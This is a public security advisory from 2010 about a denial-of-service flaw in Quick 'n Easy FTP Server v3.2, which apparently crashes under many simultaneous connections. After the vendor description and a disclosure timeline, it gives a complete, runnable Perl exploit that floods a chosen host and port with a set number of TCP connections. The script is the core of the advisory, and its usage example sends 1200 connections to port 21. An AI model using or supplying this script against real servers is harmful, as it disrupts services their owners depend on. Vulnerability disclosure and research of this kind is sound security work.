[DCA-0007]
[Software]
- Quick 'n Easy FTP Server
[Vendor Product Description]
- Quick 'n Easy FTP Server Professional is a multi threaded FTP
server for Windows 98/NT/XP and Vista(32 bits) that can be easily
setup even by inexperienced users.
New users can be easily created by a wizard which is guiding you step
by step in the process.
The server handles all basic FTP commands plus a lot of special FTP
commands like MDTM, NLST, FEAT, PSWD, XCRC and many more!
[Bug Description]
- Quick 'n Easy FTP Server can't handle multiple/simultaneous
connections leading to Denial-of-Service
[History]
- Advisory sent to vendor on 06/14/2010.
- No response from vendor
- Public advisory & exploit 08/02/2010.
[Impact]
- Low
[Affected Version]
- Quick 'n Easy FTP Server v3.2
- Prior versions may also be vulnerable
[Code]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num = 0;
print "[+] Sending request...\n";
while ( $num <= $conn ) {
system("echo -n .");
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
close($s);
$num++;
}
print "\n[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";
print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n";
exit;
}
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
